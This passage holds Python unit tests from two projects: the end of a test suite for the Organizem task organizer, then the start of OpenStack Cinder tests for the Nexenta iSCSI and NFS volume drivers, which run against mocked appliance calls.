{Elem.NOTE : note}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item) self.assertTrue(orgm.find_items(Elem.NOTE, note_rgx, use_regex_match=True)) orgm.remove_items(Elem.NOTE, note_rgx, use_regex_match=True) self.assertFalse(orgm.find_items(Elem.NOTE, note_rgx)) def test_get_all_titles(self): self._init_test_data_file() title1 = 'title 1' title2 = 'title 2' item1 = Item(title1) item2 = Item(title2) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item1) orgm.add_item(item2) # Have to handle the fact that init of test dat file includes dummy item with "TEST_ITEM" title self.assertTrue(orgm.get_elements(Elem.TITLE) == ['TEST_ITEM', 'title 1', 'title 2']) def test_get_all_projects(self): self._init_test_data_file() title1 = 'title 1' title2 = 'title 2' project1 = 'project 1' project2 = 'project 2' item1 = Item(title1, {Elem.PROJECT : project1}) item2 = Item(title2, {Elem.PROJECT : project2}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item1) orgm.add_item(item2) expected = ["''", 'project 1', 'project 2'] actual = orgm.get_elements(Elem.PROJECT) # Have to handle the fact that init of test dat file includes dummy item with empty name self.assertTrue(expected == actual) def test_get_all_areas(self): self._init_test_data_file() title1 = 'title 1' title2 = 'title 2' area1 = 'area 1' area2 = 'area 2' item1 = Item(title1, {Elem.AREA : area1}) item2 = Item(title2, {Elem.AREA : area2}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item1) orgm.add_item(item2) expected = ["''", 'area 1', 'area 2'] actual = orgm.get_elements(Elem.AREA) # Have to handle the fact that init of test dat file includes dummy item with empty name self.assertTrue(expected == actual) def test_get_all_tags(self): self._init_test_data_file() title1 = 'title 1' title2 = 'title 2' tags1 = ['tag 1', 'tag 2'] tags2 = ['tag 3', 'tag 4'] item1 = Item(title1, {Elem.TAGS : tags1}) item2 = Item(title2, {Elem.TAGS : tags2}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item1) orgm.add_item(item2) expected = ['tag 1', 'tag 2', 'tag 3', 'tag 4'] actual = orgm.get_elements(Elem.TAGS) # Have to handle the fact that init of test dat file includes dummy item with empty name self.assertTrue(expected == actual) def test_get_all_actions(self): self._init_test_data_file() title1 = 'title 1' title2 = 'title 2' actions1 = ['action 1', 'action 2'] actions2 = ['action 3', 'action 4'] item1 = Item(title1, {Elem.ACTIONS : actions1}) item2 = Item(title2, {Elem.ACTIONS : actions2}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item1) orgm.add_item(item2) expected = ['action 1', 'action 2', 'action 3', 'action 4'] actual = orgm.get_elements(Elem.ACTIONS) # Have to handle the fact that init of test dat file includes dummy item with empty name self.assertTrue(expected == actual) def test_get_grouped_items_project(self): self._init_test_data_file() title1 = 'title 1' title2 = 'title 2' title3 = 'title 3' title4 = 'title 4' project1 = 'project 1' project2 = 'project 2' item1 = Item(title1, {Elem.PROJECT : project1}) item2 = Item(title2, {Elem.PROJECT : project2}) item3 = Item(title3, {Elem.PROJECT : project1}) item4 = Item(title4, {Elem.PROJECT : project2}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item1) orgm.add_item(item2) orgm.add_item(item3) orgm.add_item(item4) expected1 = repr([{'item' : [{'title': 'title 1'}, {'area': "''"}, {'project': 'project 1'}, {'tags': []}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}, {'item' : [{'title': 'title 3'}, {'area': "''"}, {'project': 'project 1'}, {'tags': []}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}]) expected2 = repr([{'item' : [{'title': 'title 2'}, {'area': "''"}, {'project': 'project 2'}, {'tags': []}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}, {'item' : [{'title': 'title 4'}, {'area': "''"}, {'project': 'project 2'}, {'tags': []}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}]) actual = orgm.get_grouped_items(Elem.PROJECT) actual1 = repr(actual[project1]) actual2 = repr(actual[project2]) self.assertTrue(expected1 == actual1) self.assertTrue(expected2 == actual2) def test_get_grouped_items_area(self): self._init_test_data_file() title1 = 'title 1' title2 = 'title 2' title3 = 'title 3' title4 = 'title 4' area1 = 'area 1' area2 = 'area 2' item1 = Item(title1, {Elem.AREA : area1}) item2 = Item(title2, {Elem.AREA : area2}) item3 = Item(title3, {Elem.AREA : area1}) item4 = Item(title4, {Elem.AREA : area2}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item1) orgm.add_item(item2) orgm.add_item(item3) orgm.add_item(item4) expected1 = repr([{'item' : [{'title': 'title 1'}, {'area': 'area 1'}, {'project': "''"}, {'tags': []}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}, {'item' : [{'title': 'title 3'}, {'area': 'area 1'}, {'project': "''"}, {'tags': []}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}]) expected2 = repr([{'item' : [{'title': 'title 2'}, {'area': 'area 2'}, {'project': "''"}, {'tags': []}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}, {'item' : [{'title': 'title 4'}, {'area': 'area 2'}, {'project': "''"}, {'tags': []}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}]) actual = orgm.get_grouped_items(Elem.AREA) actual1 = repr(actual[area1]) actual2 = repr(actual[area2]) self.assertTrue(expected1 == actual1) self.assertTrue(expected2 == actual2) def test_get_grouped_items_tags(self): self._init_test_data_file() title1 = 'title 1' title2 = 'title 2' title3 = 'title 3' title4 = 'title 4' tag1 = 'tag 1' tag2 = 'tag 2' tag3 = 'tag 3' tag4 = 'tag 4' tags1 = [tag1, tag2] tags2 = [tag3, tag4] item1 = Item(title1, {Elem.TAGS : tags1}) item2 = Item(title2, {Elem.TAGS : tags2}) item3 = Item(title3, {Elem.TAGS : tags1}) item4 = Item(title4, {Elem.TAGS : tags2}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item1) orgm.add_item(item2) orgm.add_item(item3) orgm.add_item(item4) expected1 = repr([{'item' : [{'title': 'title 1'}, {'area': "''"}, {'project': "''"}, {'tags': [tag1, tag2]}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}, \ {'item' : [{'title': 'title 3'}, {'area': "''"}, {'project': "''"}, {'tags': [tag1, tag2]}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}]) expected2 = repr([{'item' : [{'title': 'title 1'}, {'area': "''"}, {'project': "''"}, {'tags': [tag1, tag2]}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}, \ {'item' : [{'title': 'title 3'}, {'area': "''"}, {'project': "''"}, {'tags': [tag1, tag2]}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}]) expected3 = repr([{'item' : [{'title': 'title 2'}, {'area': "''"}, {'project': "''"}, {'tags': [tag3, tag4]}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}, \ {'item' : [{'title': 'title 4'}, {'area': "''"}, {'project': "''"}, {'tags': [tag3, tag4]}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}]) expected4 = repr([{'item' : [{'title': 'title 2'}, {'area': "''"}, {'project': "''"}, {'tags': [tag3, tag4]}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}, \ {'item' : [{'title': 'title 4'}, {'area': "''"}, {'project': "''"}, {'tags': [tag3, tag4]}, {'actions': []},{'priority': "''"}, {'due_date': "''"}, {'note': ''}]}]) actual = orgm.get_grouped_items(Elem.TAGS) actual1 = repr(actual[tag1]) actual2 = repr(actual[tag2]) actual3 = repr(actual[tag3]) actual4 = repr(actual[tag4]) self.assertTrue(expected1 == actual1) self.assertTrue(expected2 == actual2) self.assertTrue(expected3 == actual3) self.assertTrue(expected4 == actual4) def test_regroup_data_file_project(self): self._init_test_data_file() title1 = 'title 1' title2 = 'title 2' title3 = 'title 3' title4 = 'title 4' project1 = 'project 1' project2 = 'project 2' item1 = Item(title1, {Elem.PROJECT : project1}) item2 = Item(title2, {Elem.PROJECT : project2}) item3 = Item(title3, {Elem.PROJECT : project1}) item4 = Item(title4, {Elem.PROJECT : project2}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item1) orgm.add_item(item2) orgm.add_item(item3) orgm.add_item(item4) grouped_items = orgm.get_grouped_items(Elem.PROJECT) new_data_file_str = orgm.regroup_data_file(Elem.PROJECT, ActionArg.ASCENDING, with_group_labels=False) grouped_items_str = [] for group_key in grouped_items.keys(): for item in grouped_items[group_key]: grouped_items_str.append(str(item)) grouped_items_str = "\n".join(grouped_items_str) self.assertTrue(grouped_items_str == new_data_file_str) def test_regroup_data_file_area(self): self._init_test_data_file() title1 = 'title 1' title2 = 'title 2' title3 = 'title 3' title4 = 'title 4' area1 = 'area 1' area2 = 'area 2' item1 = Item(title1, {Elem.AREA : area1}) item2 = Item(title2, {Elem.AREA : area2}) item3 = Item(title3, {Elem.AREA : area1}) item4 = Item(title4, {Elem.AREA : area2}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item1) orgm.add_item(item2) orgm.add_item(item3) orgm.add_item(item4) grouped_items = orgm.get_grouped_items(Elem.AREA) new_data_file_str = orgm.regroup_data_file(Elem.AREA, ActionArg.ASCENDING, with_group_labels=False) grouped_items_str = [] for group_key in grouped_items.keys(): for item in grouped_items[group_key]: grouped_items_str.append(str(item)) grouped_items_str = "\n".join(grouped_items_str) self.assertTrue(grouped_items_str == new_data_file_str) def test_regroup_data_file_area_sort_desc(self): self._init_test_data_file() title1 = 'title 1' title2 = 'title 2' title3 = 'title 3' title4 = 'title 4' area1 = 'area 1' area2 = 'area 2' item1 = Item(title1, {Elem.AREA : area1}) item2 = Item(title2, {Elem.AREA : area2}) item3 = Item(title3, {Elem.AREA : area1}) item4 = Item(title4, {Elem.AREA : area2}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item1) orgm.add_item(item2) orgm.add_item(item3) orgm.add_item(item4) grouped_items = orgm.get_grouped_items(Elem.AREA) new_data_file_str = orgm.regroup_data_file(Elem.AREA, ActionArg.DESCENDING, with_group_labels=False) grouped_items_str = [] group_keys = grouped_items.keys() group_keys.reverse() for group_key in group_keys: for item in grouped_items[group_key]: grouped_items_str.append(str(item)) grouped_items_str = "\n".join(grouped_items_str) self.assertTrue(grouped_items_str == new_data_file_str) def test_regroup_data_file_tags(self): self._init_test_data_file() title1 = 'title 1' title2 = 'title 2' title3 = 'title 3' title4 = 'title 4' tag1 = 'tag 1' tag2 = 'tag 2' tag3 = 'tag 3' tag4 = 'tag 4' tags1 = [tag1, tag2] tags2 = [tag3, tag4] item1 = Item(title1, {Elem.TAGS : tags1}) item2 = Item(title2, {Elem.TAGS : tags2}) item3 = Item(title3, {Elem.TAGS : tags1}) item4 = Item(title4, {Elem.TAGS : tags2}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item1) orgm.add_item(item2) orgm.add_item(item3) orgm.add_item(item4) grouped_items = orgm.get_grouped_items(Elem.TAGS) new_data_file_str = orgm.regroup_data_file(Elem.TAGS, ActionArg.ASCENDING, with_group_labels=False) grouped_items_str = [] for group_key in grouped_items.keys(): for item in grouped_items[group_key]: grouped_items_str.append(str(item)) grouped_items_str = "\n".join(grouped_items_str) self.assertTrue(grouped_items_str == new_data_file_str) def test_regroup_data_file_tags_sort_desc(self): self._init_test_data_file() title1 = 'title 1' title2 = 'title 2' title3 = 'title 3' title4 = 'title 4' tag1 = 'tag 1' tag2 = 'tag 2' tag3 = 'tag 3' tag4 = 'tag 4' tags1 = [tag1, tag2] tags2 = [tag3, tag4] item1 = Item(title1, {Elem.TAGS : tags1}) item2 = Item(title2, {Elem.TAGS : tags2}) item3 = Item(title3, {Elem.TAGS : tags1}) item4 = Item(title4, {Elem.TAGS : tags2}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item1) orgm.add_item(item2) orgm.add_item(item3) orgm.add_item(item4) grouped_items = orgm.get_grouped_items(Elem.TAGS) new_data_file_str = orgm.regroup_data_file(Elem.TAGS, ActionArg.DESCENDING, with_group_labels=False) grouped_items_str = [] group_keys = grouped_items.keys() group_keys.reverse() for group_key in group_keys: for item in grouped_items[group_key]: grouped_items_str.append(str(item)) grouped_items_str = "\n".join(grouped_items_str) self.assertTrue(grouped_items_str == new_data_file_str) def test_backup(self): self._init_test_data_file() title1 = 'title 1' title2 = 'title 2' title3 = 'title 3' title4 = 'title 4' tag1 = 'tag 1' tag2 = 'tag 2' tag3 = 'tag 3' tag4 = 'tag 4' tags1 = [tag1, tag2] tags2 = [tag3, tag4] item1 = Item(title1, {Elem.TAGS : tags1}) item2 = Item(title2, {Elem.TAGS : tags2}) item3 = Item(title3, {Elem.TAGS : tags1}) item4 = Item(title4, {Elem.TAGS : tags2}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item1) orgm.add_item(item2) orgm.add_item(item3) orgm.add_item(item4) bak_data_file = 'orgm_test.dat_bak' orgm.backup(bak_data_file) import filecmp filecmp.cmp(TEST_DATA_FILE, bak_data_file) # NOTE: This is a maual test, no assert(). User must look at TEST_DATA_FILE # and confirm there is a new empty item def test_add_empty(self): self._init_test_data_file() orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_empty() #def test_add_item__find_item_by_title__cli(self): # self._init_test_data_file() # orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) # title = 'my item title' # cmd = ['-- add', '--title', title] # orgm.run_shell_cmd(cmd) # self.assertTrue(orgm.find_items(Elem.TITLE, title)) if __name__ == '__main__': unittest.main()
# # Copyright 2015 Nexenta Systems, Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ Unit tests for OpenStack Cinder volume driver """ import mock from oslo_utils import units from cinder import context from cinder import db from cinder import exception from cinder import test from cinder.volume import configuration as conf from cinder.volume.drivers.nexenta import iscsi from cinder.volume.drivers.nexenta import jsonrpc from cinder.volume.drivers.nexenta import nfs from cinder.volume.drivers.nexenta import utils class TestNexentaISCSIDriver(test.TestCase): TEST_VOLUME_NAME = 'volume1' TEST_VOLUME_NAME2 = 'volume2' TEST_SNAPSHOT_NAME = 'snapshot1' TEST_VOLUME_REF = { 'name': TEST_VOLUME_NAME, 'size': 1, 'id': '1', 'status': 'available' } TEST_VOLUME_REF2 = { 'name': TEST_VOLUME_NAME2, 'size': 1, 'id': '2', 'status': 'in-use' } TEST_SNAPSHOT_REF = { 'name': TEST_SNAPSHOT_NAME, 'volume_name': TEST_VOLUME_NAME, } def __init__(self, method): super(TestNexentaISCSIDriver, self).__init__(method) def setUp(self): super(TestNexentaISCSIDriver, self).setUp() self.cfg = mock.Mock(spec=conf.Configuration) self.ctxt = context.get_admin_context() self.cfg.nexenta_dataset_description = '' self.cfg.nexenta_host = '1.1.1.1' self.cfg.nexenta_user = 'admin' self.cfg.nexenta_password = 'nexenta' self.cfg.nexenta_volume = 'cinder' self.cfg.nexenta_rest_port = 2000 self.cfg.nexenta_rest_protocol = 'http' self.cfg.nexenta_iscsi_target_portal_port = 3260 self.cfg.nexenta_target_prefix = 'iqn:' self.cfg.nexenta_target_group_prefix = 'cinder/' self.cfg.nexenta_blocksize = '8K' self.cfg.nexenta_sparse = True self.cfg.nexenta_dataset_compression = 'on' self.cfg.nexenta_dataset_dedup = 'off' self.cfg.nexenta_rrmgr_compression = 1 self.cfg.nexenta_rrmgr_tcp_buf_size = 1024 self.cfg.nexenta_rrmgr_connections = 2 self.cfg.reserved_percentage = 20 self.nms_mock = mock.Mock() for mod in ['volume', 'zvol', 'iscsitarget', 'appliance', 'stmf', 'scsidisk', 'snapshot']: setattr(self.nms_mock, mod, mock.Mock()) self.stubs.Set(jsonrpc, 'NexentaJSONProxy', lambda *_, **__: self.nms_mock) self.drv = iscsi.NexentaISCSIDriver( configuration=self.cfg) self.drv.db = db self.drv.do_setup(self.ctxt) def test_check_do_setup(self): self.assertEqual('http', self.drv.nms_protocol) def test_check_for_setup_error(self): self.nms_mock.volume.object_exists.return_value = False self.assertRaises(LookupError, self.drv.check_for_setup_error) def test_local_path(self): self.assertRaises(NotImplementedError, self.drv.local_path, '') def test_create_volume(self): self.drv.create_volume(self.TEST_VOLUME_REF) self.nms_mock.zvol.create.assert_called_with( 'cinder/%s' % self.TEST_VOLUME_REF['name'], '1G', self.cfg.nexenta_blocksize, self.cfg.nexenta_sparse) def test_delete_volume(self): self.nms_mock.zvol.get_child_props.return_value = ( {'origin': 'cinder/volume0@snapshot'}) self.drv.delete_volume(self.TEST_VOLUME_REF) self.nms_mock.zvol.get_child_props.assert_called_with( 'cinder/volume1', 'origin') self.nms_mock.zvol.destroy.assert_called_with( 'cinder/volume1', '') self.nms_mock.zvol.get_child_props.assert_called_with( 'cinder/volume1', 'origin') self.nms_mock.zvol.destroy.assert_called_with('cinder/volume1', '') self.drv.delete_volume(self.TEST_VOLUME_REF) self.nms_mock.zvol.get_child_props.assert_called_with( 'cinder/volume1', 'origin') self.nms_mock.zvol.get_child_props.return_value = ( {'origin': 'cinder/volume0@cinder-clone-snapshot-1'}) self.nms_mock.zvol.destroy.assert_called_with('cinder/volume1', '') self.drv.delete_volume(self.TEST_VOLUME_REF) self.nms_mock.snapshot.destroy.assert_called_with( 'cinder/volume0@cinder-clone-snapshot-1', '') self.nms_mock.volume.object_exists.assert_called_with('cinder/volume0') def test_create_cloned_volume(self): vol = self.TEST_VOLUME_REF2 src_vref = self.TEST_VOLUME_REF snapshot = { 'volume_name': src_vref['name'], 'name': 'cinder-clone-snapshot-%s' % vol['id'], } self.drv.create_cloned_volume(vol, src_vref) self.nms_mock.zvol.create_snapshot.assert_called_with( 'cinder/%s' % src_vref['name'], snapshot['name'], '') self.nms_mock.zvol.clone.assert_called_with( 'cinder/%s@%s' % (src_vref['name'], snapshot['name']), 'cinder/%s' % vol['name']) def test_migrate_volume(self): volume = self.TEST_VOLUME_REF host = { 'capabilities': { 'vendor_name': 'Nexenta', 'location_info': 'NexentaISCSIDriver:1.1.1.1:cinder', 'free_capacity_gb': 1, 'iscsi_target_portal_port': 3260, 'nms_url': 'http://admin:password@1.1.1.1:2000' } } snapshot = { 'volume_name': volume['name'], 'name': 'cinder-migrate-snapshot-%s' % volume['id'], } volume_name = 'cinder/%s' % volume['name'] self.nms_mock.appliance.ssh_list_bindings.return_value = ( {'0': [True, True, True, '1.1.1.1']}) self.nms_mock.zvol.get_child_props.return_value = None self.drv.migrate_volume(None, volume, host) self.nms_mock.zvol.create_snapshot.assert_called_with( 'cinder/%s' % volume['name'], snapshot['name'], '') src = '%(volume)s/%(zvol)s@%(snapshot)s' % { 'volume': 'cinder', 'zvol': volume['name'], 'snapshot': snapshot['name'] } dst = '1.1.1.1:cinder' cmd = ' '.join(['rrmgr -s zfs -c 1 -q -e -w 1024 -n 2', src, dst]) self.nms_mock.appliance.execute.assert_called_with(cmd) snapshot_name = 'cinder/%(volume)s@%(snapshot)s' % { 'volume': volume['name'], 'snapshot': snapshot['name'] } self.nms_mock.snapshot.destroy.assert_called_with(snapshot_name, '') self.nms_mock.zvol.destroy.assert_called_with(volume_name, '') self.nms_mock.snapshot.destroy.assert_called_with( 'cinder/%(volume)s@%(snapshot)s' % { 'volume': volume['name'], 'snapshot': snapshot['name'] }, '') self.nms_mock.volume.object_exists.assert_called_with(volume_name) self.mox.ReplayAll() def test_create_snapshot(self): self.drv.create_snapshot(self.TEST_SNAPSHOT_REF) self.nms_mock.zvol.create_snapshot.assert_called_with( 'cinder/volume1', 'snapshot1', '') def test_create_volume_from_snapshot(self): self.drv.create_volume_from_snapshot(self.TEST_VOLUME_REF2, self.TEST_SNAPSHOT_REF) self.nms_mock.zvol.clone.assert_called_with( 'cinder/volume1@snapshot1', 'cinder/volume2') def test_delete_snapshot(self): self._create_volume_db_entry() self.drv.delete_snapshot(self.TEST_SNAPSHOT_REF) self.nms_mock.snapshot.destroy.assert_called_with( 'cinder/volume1@snapshot1', '') self.nms_mock.volume.object_exists.assert_called_with( 'cinder/volume1') # Check that exception not raised if snapshot does not exist self.drv.delete_snapshot(self.TEST_SNAPSHOT_REF) self.nms_mock.snapshot.destroy.side_effect = ( exception.NexentaException('does not exist')) self.nms_mock.snapshot.destroy.assert_called_with( 'cinder/volume1@snapshot1', '') self.nms_mock.volume.object_exists.assert_called_with( 'cinder/volume1') def _mock_all_export_methods(self, fail=False): self.assertTrue(self.nms_mock.stmf.list_targets.called) self.nms_mock.iscsitarget.create_target.assert_called_with( {'target_name': 'iqn:1.1.1.1-0'}) self.nms_mock.stmf.list_targetgroups() zvol_name = 'cinder/volume1' self.nms_mock.stmf.create_targetgroup.assert_called_with( 'cinder/1.1.1.1-0') self.nms_mock.stmf.list_targetgroup_members.assert_called_with( 'cinder/1.1.1.1-0') self.nms_mock.scsidisk.lu_exists.assert_called_with(zvol_name) self.nms_mock.scsidisk.create_lu.assert_called_with(zvol_name, {}) def _stub_all_export_methods(self): self.nms_mock.scsidisk.lu_exists.return_value = False self.nms_mock.scsidisk.lu_shared.side_effect = ( exception.NexentaException(['does not exist for zvol'])) self.nms_mock.scsidisk.create_lu.return_value = {'lun': 0} self.nms_mock.stmf.list_targets.return_value = [] self.nms_mock.stmf.list_targetgroups.return_value = [] self.nms_mock.stmf.list_targetgroup_members.return_value = [] self.nms_mock._get_target_name.return_value = ['iqn:1.1.1.1-0'] self.nms_mock.iscsitarget.create_targetgroup.return_value = ({ 'target_name': 'cinder/1.1.1.1-0'}) self.nms_mock.scsidisk.add_lun_mapping_entry.return_value = {'lun': 0} def test_create_export(self): self._stub_all_export_methods() retval = self.drv.create_export({}, self.TEST_VOLUME_REF, None) self._mock_all_export_methods() location = '%(host)s:%(port)s,1 %(name)s %(lun)s' % { 'host': self.cfg.nexenta_host, 'port': self.cfg.nexenta_iscsi_target_portal_port, 'name': 'iqn:1.1.1.1-0', 'lun': '0' } self.assertEqual({'provider_location': location}, retval) def test_ensure_export(self): self._stub_all_export_methods() self.drv.ensure_export({}, self.TEST_VOLUME_REF) self._mock_all_export_methods() def test_remove_export(self): self.nms_mock.stmf.list_targets.return_value = ['iqn:1.1.1.1-0'] self.nms_mock.stmf.list_targetgroups.return_value = ( ['cinder/1.1.1.1-0']) self.nms_mock.stmf.list_targetgroup_members.return_value = ( ['iqn:1.1.1.1-0']) self.drv.remove_export({}, self.TEST_VOLUME_REF) self.assertTrue(self.nms_mock.stmf.list_targets.called) self.assertTrue(self.nms_mock.stmf.list_targetgroups.called) self.nms_mock.scsidisk.delete_lu.assert_called_with('cinder/volume1') def test_get_volume_stats(self): stats = {'size': '5368709120G', 'used': '5368709120G', 'available': '5368709120G', 'health': 'ONLINE'} self.nms_mock.volume.get_child_props.return_value = stats stats = self.drv.get_volume_stats(True) self.assertEqual('iSCSI', stats['storage_protocol']) self.assertEqual(5368709120.0, stats['total_capacity_gb']) self.assertEqual(5368709120.0, stats['free_capacity_gb']) self.assertEqual(20, stats['reserved_percentage']) self.assertFalse(stats['QoS_support']) def _create_volume_db_entry(self): vol = { 'id': '1', 'size': 1, 'status': 'available', 'provider_location': self.TEST_VOLUME_NAME } return db.volume_create(self.ctxt, vol)['id'] class TestNexentaNfsDriver(test.TestCase): TEST_EXPORT1 = 'host1:/volumes/stack/share' TEST_NMS1 = 'http://admin:nexenta@host1:2000' TEST_EXPORT2 = 'host2:/volumes/stack/share' TEST_NMS2 = 'http://admin:nexenta@host2:2000' TEST_EXPORT2_OPTIONS = '-o intr' TEST_FILE_NAME = 'test.txt' TEST_SHARES_CONFIG_FILE = '/etc/cinder/nexenta-shares.conf' TEST_SHARE_SVC = 'svc:/network/nfs/server:default' TEST_SHARE_OPTS = { 'read_only': '', 'read_write': '*', 'recursive': 'true', 'anonymous_rw': 'true', 'extra_options': 'anon=0', 'root': 'nobody' } def _create_volume_db_entry(self): vol = { 'id': '1', 'size': 1, 'status': 'available', 'provider_location': self.TEST_EXPORT1 } return db.volume_create(self.ctxt, vol)['id'] def setUp(self): super(TestNexentaNfsDriver, self).setUp() self.ctxt = context.get_admin_context() self.cfg = mock.Mock(spec=conf.Configuration) self.cfg.nexenta_dataset_description = '' self.cfg.nexenta_shares_config = None self.cfg.nexenta_mount_point_base = '$state_path/mnt' self.cfg.nexenta_sparsed_volumes = True self.cfg.nexenta_dataset_compression = 'on' self.cfg.nexenta_dataset_dedup = 'off' self.cfg.nexenta_rrmgr_compression = 1 self.cfg.nexenta_rrmgr_tcp_buf_size = 1024 self.cfg.nexenta_rrmgr_connections = 2 self.cfg.nfs_mount_point_base = '/mnt/test' self.cfg.nfs_mount_options = None self.cfg.nas_mount_options = None self.cfg.nexenta_nms_cache_volroot = False self.cfg.nfs_mount_attempts = 3 self.cfg.reserved_percentage = 20 self.cfg.max_over_subscription_ratio = 20.0 self.nms_mock = mock.Mock() for mod in ('appliance', 'folder', 'server', 'volume', 'netstorsvc', 'snapshot', 'netsvc'): setattr(self.nms_mock, mod, mock.Mock()) self.nms_mock.__hash__ = lambda *_, **__: 1 self.stubs.Set(jsonrpc, 'NexentaJSONProxy', lambda *_, **__: self.nms_mock) self.drv = nfs.NexentaNfsDriver(configuration=self.cfg) self.drv.shares = {} self.drv.share2nms = {} def test_check_for_setup_error(self): self.drv.share2nms = { 'host1:/volumes/stack/share': self.nms_mock } self.nms_mock.server.get_prop.return_value = '/volumes' self.nms_mock.volume.object_exists.return_value = True self.nms_mock.folder.object_exists.return_value = True share_opts = { 'read_write': '*', 'read_only': '', 'root': 'nobody', 'extra_options': 'anon=0', 'recursive': 'true', 'anonymous_rw': 'true', } self.drv.check_for_setup_error() self.nms_mock.netstorsvc.share_folder.assert_called_with( 'svc:/network/nfs/server:default', 'stack/share', share_opts) self.nms_mock.server.get_prop.return_value = '/volumes' self.nms_mock.volume.object_exists.return_value = False self.assertRaises(LookupError, self.drv.check_for_setup_error) self.nms_mock.server.get_prop.return_value = '/volumes' self.nms_mock.volume.object_exists.return_value = True self.nms_mock.folder.object_exists.return_value = False self.assertRaises(LookupError, self.drv.check_for_setup_error) def test_initialize_connection(self): self.drv.shares = { self.TEST_EXPORT1: None } volume = { 'provider_location': self.TEST_EXPORT1, 'name': 'volume' } result = self.drv.initialize_connection(volume, None) self.assertEqual('%s/volume' % self.TEST_EXPORT1, result['data']['export']) def test_do_create_volume(self): volume = { 'provider_location': self.TEST_EXPORT1, 'size': 1, 'name': 'volume-1' } self.drv.shares = {self.TEST_EXPORT1: None} self.drv.share2nms = {self.TEST_EXPORT1: self.nms_mock} compression = self.cfg.nexenta_dataset_compression self.nms_mock.server.get_prop.return_value = '/volumes' self.nms_mock.netsvc.get_confopts('svc:/network/nfs/server:default', 'configure').AndReturn({ 'nfs_server_versmax': { 'current': u'3'}}) self.nms_mock.netsvc.get_confopts.return_value = { 'nfs_server_versmax': {'current': 4}} self.nms_mock._ensure_share_mounted.return_value = True self.drv._do_create_volume(volume) self.nms_mock.folder.create_with_props.assert_called_with( 'stack', 'share/volume-1', {'compression': compression}) self.nms_mock.netstorsvc.share_folder.assert_called_with( self.TEST_SHARE_SVC, 'stack/share/volume-1', self.TEST_SHARE_OPTS) mock_chmod = self.nms_mock.appliance.execute mock_chmod.assert_called_with( 'chmod ugo+rw /volumes/stack/share/volume-1/volume') mock_truncate = self.nms_mock.appliance.execute mock_truncate.side_effect = exception.NexentaException() self.nms_mock.server.get_prop.return_value = '/volumes' self.assertRaises(exception.NexentaException, self.drv._do_create_volume, volume) def test_create_sparsed_file(self): self.drv._create_sparsed_file(self.nms_mock, '/tmp/path', 1) self.nms_mock.appliance.execute.assert_called_with( 'truncate --size 1G /tmp/path') def test_create_regular_file(self): self.drv._create_regular_file(self.nms_mock, '/tmp/path', 1) self.nms_mock.appliance.execute.assert_called_with( 'dd if=/dev/zero of=/tmp/path bs=1M count=1024') def test_set_rw_permissions_for_all(self): path = '/tmp/path' self.drv._set_rw_permissions_for_all(self.nms_mock, path) self.nms_mock.appliance.execute.assert_called_with( 'chmod ugo+rw %s' % path) def test_local_path(self): volume = {'provider_location': self.TEST_EXPORT1, 'name': 'volume-1'} path = self.drv.local_path(volume) self.assertEqual( '$state_path/mnt/b3f660847a52b29ac330d8555e4ad669/volume-1/volume', path ) def test_remote_path(self): volume = {'provider_location': self.TEST_EXPORT1, 'name': 'volume-1'} path = self.drv.remote_path(volume) self.assertEqual('/volumes/stack/share/volume-1/volume', path) def test_share_folder(self): self.drv._share_folder(self.nms_mock, 'stack', 'share/folder') path = 'stack/share/folder' self.nms_mock.netstorsvc.share_folder.assert_called_with( self.TEST_SHARE_SVC, path, self.TEST_SHARE_OPTS) def test_load_shares_config(self): self.drv.configuration.nfs_shares_config = ( self.TEST_SHARES_CONFIG_FILE) config_data = [ '%s %s' % (self.TEST_EXPORT1, self.TEST_NMS1), '# %s %s' % (self.TEST_EXPORT2, self.TEST_NMS2), '', '%s %s %s' % (self.TEST_EXPORT2, self.TEST_NMS2, 